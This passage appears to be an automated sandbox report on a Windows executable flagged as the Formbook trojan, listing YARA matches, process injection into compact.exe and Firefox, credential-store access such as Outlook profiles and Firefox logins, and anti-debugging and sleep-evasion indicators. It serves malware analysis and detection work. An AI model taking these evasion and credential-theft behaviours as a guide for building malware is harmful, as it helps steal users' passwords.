          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: String function: 01077E54 appears 99 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: String function: 0101B970 appears 262 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: String function: 0109EA12 appears 86 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: String function: 010AF290 appears 103 times
          Source: NjjLYnPSZr.exeStatic PE information: No import functions for PE file found
          Source: NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000002.1971204229.00000000012C1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.0000000000934000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: NjjLYnPSZr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: NjjLYnPSZr.exeStatic PE information: Section .text
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@13/9
          Source: C:\Windows\SysWOW64\compact.exeFile created: C:\Users\user\AppData\Local\Temp\s1951-LPlJump to behavior
          Source: NjjLYnPSZr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: compact.exe, 00000005.00000002.3603499562.00000000032D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: NjjLYnPSZr.exeReversingLabs: Detection: 60%
          Source: unknownProcess created: C:\Users\user\Desktop\NjjLYnPSZr.exe "C:\Users\user\Desktop\NjjLYnPSZr.exe"
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
          Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: NjjLYnPSZr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: compact.pdbGCTL source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XFLTednCZUTqje.exe, 00000002.00000000.1894942549.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3603415797.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: NjjLYnPSZr.exe, NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: compact.pdb source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E080F3 pushfd ; iretd 0_2_00E080F4
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF18FB push ebx; iretd 0_2_00DF18FE
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DFD227 pushfd ; retf 0_2_00DFD22A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF33D0 push eax; ret 0_2_00DF33D2
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF531E push ebp; ret 0_2_00DF5337
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF8415 push ebp; ret 0_2_00DF8416
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF1590 push ebx; iretd 0_2_00DF165C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF165F push ebx; iretd 0_2_00DF165C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF1663 push ebx; iretd 0_2_00DF165C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF1663 push ebx; iretd 0_2_00DF168A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF1786 push ebx; iretd 0_2_00DF1788
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00DF1728 push ebx; iretd 0_2_00DF1759
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010209AD push ecx; mov dword ptr [esp], ecx0_2_010209B6
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034E6919 push ebp; ret 2_2_034E691A
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034E3822 push ebp; ret 2_2_034E383B
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034EB72B pushfd ; retf 2_2_034EB72E
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeCode function: 2_2_034F65F7 pushfd ; iretd 2_2_034F65F8
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038109AD push ecx; mov dword ptr [esp], ecx5_2_038109B6
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F8401 push edx; ret 5_2_030F8402
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F4D20 pushfd ; iretd 5_2_030F4D21
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030E5042 push ebp; ret 5_2_030E5043
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FD714 push esi; retf 5_2_030FD6CB
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FD72D pushfd ; iretd 5_2_030FD74F
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FD6B4 push esi; retf 5_2_030FD6CB
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FD6C0 push esi; retf 5_2_030FD6CB
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FD6DF push esi; retf 5_2_030FD6CB
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030E1F4B push ebp; ret 5_2_030E1F64
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FF3AD push esi; ret 5_2_036FF3AE
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FC381 pushad ; ret 5_2_036FC382
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FA29B push ecx; iretd 5_2_036FA29D
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036F5761 pushfd ; ret 5_2_036F585F
          Source: NjjLYnPSZr.exeStatic PE information: section name: .text entropy: 7.995793913523369
          Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106096E rdtsc 0_2_0106096E
          Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 934Jump to behavior
          Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 9039Jump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeAPI coverage: 0.7 %
          Source: C:\Windows\SysWOW64\compact.exeAPI coverage: 2.6 %
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936Thread sleep count: 934 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936Thread sleep time: -1868000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936Thread sleep count: 9039 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\compact.exe TID: 7936Thread sleep time: -18078000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe TID: 7952Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe TID: 7952Thread sleep time: -43500s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\compact.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030FC340 FindFirstFileW,FindNextFileW,FindClose,5_2_030FC340
          Source: compact.exe, 00000005.00000002.3603499562.000000000321D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2269930168.000001D7E660C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: XFLTednCZUTqje.exe, 00000006.00000002.3604274339.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\compact.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0106096E rdtsc 0_2_0106096E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_00E07623 LdrLoadDll,0_2_00E07623
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov eax, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov ecx, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov eax, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov eax, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov ecx, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov eax, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov eax, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov ecx, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov eax, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CE10E mov ecx, dword ptr fs:[00000030h]0_2_010CE10E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CA118 mov ecx, dword ptr fs:[00000030h]0_2_010CA118
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CA118 mov eax, dword ptr fs:[00000030h]0_2_010CA118
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CA118 mov eax, dword ptr fs:[00000030h]0_2_010CA118
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010CA118 mov eax, dword ptr fs:[00000030h]0_2_010CA118
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E0115 mov eax, dword ptr fs:[00000030h]0_2_010E0115
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01050124 mov eax, dword ptr fs:[00000030h]0_2_01050124
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B4144 mov eax, dword ptr fs:[00000030h]0_2_010B4144
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B4144 mov eax, dword ptr fs:[00000030h]0_2_010B4144
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B4144 mov ecx, dword ptr fs:[00000030h]0_2_010B4144
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B4144 mov eax, dword ptr fs:[00000030h]0_2_010B4144
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B4144 mov eax, dword ptr fs:[00000030h]0_2_010B4144
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B8158 mov eax, dword ptr fs:[00000030h]0_2_010B8158
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026154 mov eax, dword ptr fs:[00000030h]0_2_01026154
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01026154 mov eax, dword ptr fs:[00000030h]0_2_01026154
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C156 mov eax, dword ptr fs:[00000030h]0_2_0101C156
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01060185 mov eax, dword ptr fs:[00000030h]0_2_01060185
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DC188 mov eax, dword ptr fs:[00000030h]0_2_010DC188
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DC188 mov eax, dword ptr fs:[00000030h]0_2_010DC188
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C4180 mov eax, dword ptr fs:[00000030h]0_2_010C4180
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010C4180 mov eax, dword ptr fs:[00000030h]0_2_010C4180
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A019F mov eax, dword ptr fs:[00000030h]0_2_010A019F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A019F mov eax, dword ptr fs:[00000030h]0_2_010A019F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A019F mov eax, dword ptr fs:[00000030h]0_2_010A019F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A019F mov eax, dword ptr fs:[00000030h]0_2_010A019F
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A197 mov eax, dword ptr fs:[00000030h]0_2_0101A197
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A197 mov eax, dword ptr fs:[00000030h]0_2_0101A197
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101A197 mov eax, dword ptr fs:[00000030h]0_2_0101A197
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E61C3 mov eax, dword ptr fs:[00000030h]0_2_010E61C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010E61C3 mov eax, dword ptr fs:[00000030h]0_2_010E61C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov eax, dword ptr fs:[00000030h]0_2_0109E1D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0109E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0109E1D0
